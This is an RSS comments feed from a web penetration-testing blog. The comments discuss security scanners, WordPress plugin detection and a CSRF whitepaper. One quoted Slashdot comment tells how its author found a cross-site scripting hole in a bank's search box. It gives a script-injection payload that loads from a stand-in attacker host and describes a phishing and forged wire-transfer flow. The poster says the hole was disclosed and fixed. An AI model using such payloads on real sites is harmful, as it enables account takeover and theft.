Comments for My Pen Test http://www.mypentest.com Penetration Testing Web applications Fri, 19 Jun 2009 03:10:24 -0600 http://wordpress.org/?v=2.8.4 hourly 1 Comment on WebInspect free download (15-day trial) by Amit http://www.mypentest.com/webinspect-free-download/#comment-712 Amit Fri, 19 Jun 2009 03:10:24 +0000 http://www.mypentest.com/webinspect-free-download/#comment-712 Thanks for taking out time and writing your views about the product. It was really informative. Thanks, Amit Thanks for taking out time and writing your views about the product.
It was really informative.

Thanks,
Amit

]]> Comment on How to find out what WordPress plugins a site uses by GP http://www.mypentest.com/find-all-wordpress-plugins-for-site/#comment-639 GP Sun, 31 May 2009 20:31:12 +0000 http://www.mypentest.com/?p=86#comment-639 Of course, this depends on the assumption that they are only using plugins that are listed at wordpress.org. On my site I use a bunch of custom plugins that wouldn't show up with this technique. Of course, this depends on the assumption that they are only using plugins that are listed at wordpress.org. On my site I use a bunch of custom plugins that wouldn’t show up with this technique.

]]> Comment on My car as an analogy for web security by bjou http://www.mypentest.com/web-security-car-analogy/#comment-273 bjou Fri, 30 Jan 2009 15:13:14 +0000 http://www.mypentest.com/?p=26#comment-273 Really, a nice anecdote! Keep on blogging my friend Really, a nice anecdote! Keep on blogging my friend

]]> Comment on My car as an analogy for web security by Himanshu http://www.mypentest.com/web-security-car-analogy/#comment-271 Himanshu Wed, 21 Jan 2009 10:18:10 +0000 http://www.mypentest.com/?p=26#comment-271 Very well written. I agree with you that almost all the time attackers looks for single exploit to get into the system. and one more thing take care of your Car, use a garage :) I am adding you on my blogroll. \Himanshu/ Very well written.
I agree with you that almost all the time attackers looks for single exploit to get into the system.
and one more thing take care of your Car, use a garage :)

I am adding you on my blogroll.

\Himanshu/

]]> Comment on Why HP is wrong about the Web Security Lifecycle by Lead Business http://www.mypentest.com/web-security-lifecycle/#comment-261 Lead Business Fri, 19 Dec 2008 22:21:22 +0000 http://www.mypentest.com/?p=41#comment-261 Well, looking at slide now I get what all three software kits are for. thank you. Actually I find this strange too, to have two programs to test the same things. Well, looking at slide now I get what all three software kits are for. thank you. Actually I find this strange too, to have two programs to test the same things.

]]> Comment on Why HP is wrong about the Web Security Lifecycle by Larry Smith http://www.mypentest.com/web-security-lifecycle/#comment-243 Larry Smith Sat, 15 Nov 2008 02:09:34 +0000 http://www.mypentest.com/?p=41#comment-243 I think points about WebInspect are fair but WebInspect was adopted by pen testers and security teams long before the development lifecycle was part of the picture for these tools. QA Inspect is actually identical to WebInspect under the hood in that they share exactly all of the identical capabilities except in the area of certain interactive testing modes like step mode. As a matter of practice I recommend that users of QA Inspect consult with WebInspect users and when required scan with WebInspect. QA Inspect helps to automate the process for a qa tester but complex application scans cannot be peformed blindly and thats the major difference between the tools.. the QA Inspect scan result cannot be viewed except as a set of defects in quality center or to import them into and view them with WebInspect... DevInspect on the other hand increases the code coverage of testing by combining static analysis with the black box testing methods of WebInspect... anyway, good comments,, thanks for the thread I think points about WebInspect are fair but WebInspect was adopted by pen testers and security teams long before the development lifecycle was part of the picture for these tools. QA Inspect is actually identical to WebInspect under the hood in that they share exactly all of the identical capabilities except in the area of certain interactive testing modes like step mode. As a matter of practice I recommend that users of QA Inspect consult with WebInspect users and when required scan with WebInspect. QA Inspect helps to automate the process for a qa tester but complex application scans cannot be peformed blindly and thats the major difference between the tools.. the QA Inspect scan result cannot be viewed except as a set of defects in quality center or to import them into and view them with WebInspect… DevInspect on the other hand increases the code coverage of testing by combining static analysis with the black box testing methods of WebInspect…
anyway, good comments,, thanks for the thread

]]> Comment on Why HP is wrong about the Web Security Lifecycle by rada http://www.mypentest.com/web-security-lifecycle/#comment-238 rada Tue, 04 Nov 2008 16:32:25 +0000 http://www.mypentest.com/?p=41#comment-238 Thorough study and analysis! Is there any comparable difference between QAinspect and the IBM Appscan? If you have analysed it, please let me know. Thanks Thorough study and analysis! Is there any comparable difference between QAinspect and the IBM Appscan? If you have analysed it, please let me know.
Thanks

]]> Comment on My car as an analogy for web security by Stuart Moncrieff http://www.mypentest.com/web-security-car-analogy/#comment-169 Stuart Moncrieff Thu, 09 Oct 2008 02:41:50 +0000 http://www.mypentest.com/?p=26#comment-169 Okay, now someone has stolen my rear numberplate, so the car is undrivable (I can't think of a good web security analogy for this). No one has tried to break in for the last few months though... Okay, now someone has stolen my rear numberplate, so the car is undrivable (I can’t think of a good web security analogy for this).

No one has tried to break in for the last few months though…

]]> Comment on Cross-Site Request Forgery Whitepaper by Stuart Moncrieff http://www.mypentest.com/cross-site-request-forgery-whitepaper/#comment-158 Stuart Moncrieff Wed, 01 Oct 2008 03:35:40 +0000 http://www.mypentest.com/?p=46#comment-158 This is now being discussed on <a href="http://it.slashdot.org/it/08/09/30/0136219.shtml" rel="nofollow">Slashdot</a>. My favourite comment so far... <h4>Unsurprising (Score:5, Informative)</h4> by <a href="//slashdot.org/~karmatic" rel="nofollow">karmatic (776420)</a> on Tuesday September 30, @02:06AM (<a href="//it.slashdot.org/comments.pl?sid=980243&cid=25201899" rel="nofollow">#25201899</a>) <p>This really isn't that surprising. A number of years ago, I was in a Wells Fargo branch; their kiosks are limited to showing only wellsfargo.com.</p><p>So, in an attempt to get to another site, I typed some HTML into the search box <b>on their homepage</b>, and pretty much every page on their site. Sure enough, it inserted the HTML into the page without any problems.</p><p>So, I got home, and whipped up a phishing email. It went to wellsfargo.com, used a little javascript to do a popunder, and set window.location to wellsfargo.com. The popunder self-refreshed every few seconds, and checked the cookies to see when the user had logged in. After the user logs in, it waits 9 minutes (auto-logout was 10 minutes), and then would build a form to initiate a wire transfer, and submit it - while the user was still logged in. It would then close the popunder.</p><p>So, with a simple link to a search for something like <script src="http://evilsite.tld">, I could take complete control over someone's bank account. This would be easy to pull off with an email saying something like "We have detected suspicious activity; click here to log on to wellsfargo.com". It really would take them to wellsfargo.com, and they could log in. You don't need a user/password if you control the browser.</p><p>I let them know that day, and explained how one escapes HTML. To their credit, it was fixed in a very short period of time. That still doesn't excuse that 1) they should know better, and 2) if you're going to check <b>anything</b>, it should be the one form that's <b>on every page</b>.</p> This is now being discussed on Slashdot.

My favourite comment so far…

Unsurprising (Score:5, Informative)

by karmatic (776420) on Tuesday September 30, @02:06AM (#25201899)

This really isn’t that surprising. A number of years ago, I was in a Wells Fargo branch; their kiosks are limited to showing only wellsfargo.com.

So, in an attempt to get to another site, I typed some HTML into the search box on their homepage, and pretty much every page on their site. Sure enough, it inserted the HTML into the page without any problems.

So, I got home, and whipped up a phishing email. It went to wellsfargo.com, used a little javascript to do a popunder, and set window.location to wellsfargo.com. The popunder self-refreshed every few seconds, and checked the cookies to see when the user had logged in. After the user logs in, it waits 9 minutes (auto-logout was 10 minutes), and then would build a form to initiate a wire transfer, and submit it – while the user was still logged in. It would then close the popunder.

So, with a simple link to a search for something like <script src=”http://evilsite.tld”>, I could take complete control over someone’s bank account. This would be easy to pull off with an email saying something like “We have detected suspicious activity; click here to log on to wellsfargo.com”. It really would take them to wellsfargo.com, and they could log in. You don’t need a user/password if you control the browser.

I let them know that day, and explained how one escapes HTML. To their credit, it was fixed in a very short period of time. That still doesn’t excuse that 1) they should know better, and 2) if you’re going to check anything, it should be the one form that’s on every page.

]]> Comment on Web Macro Recorder does not record by Joe http://www.mypentest.com/macro-recorder-does-not-record/#comment-69 Joe Tue, 26 Aug 2008 13:58:07 +0000 http://www.mypentest.com/?p=28#comment-69 You might also try "http://localhost./" (notice the "." after localhost). I believe this problem is cuased by the fact that the .NET Framework re-routes localhost queries around proxies, but putting the dot after it tricks the framework into avoiding the bypass. You might also try “http://localhost./” (notice the “.” after localhost). I believe this problem is cuased by the fact that the .NET Framework re-routes localhost queries around proxies, but putting the dot after it tricks the framework into avoiding the bypass.

]]>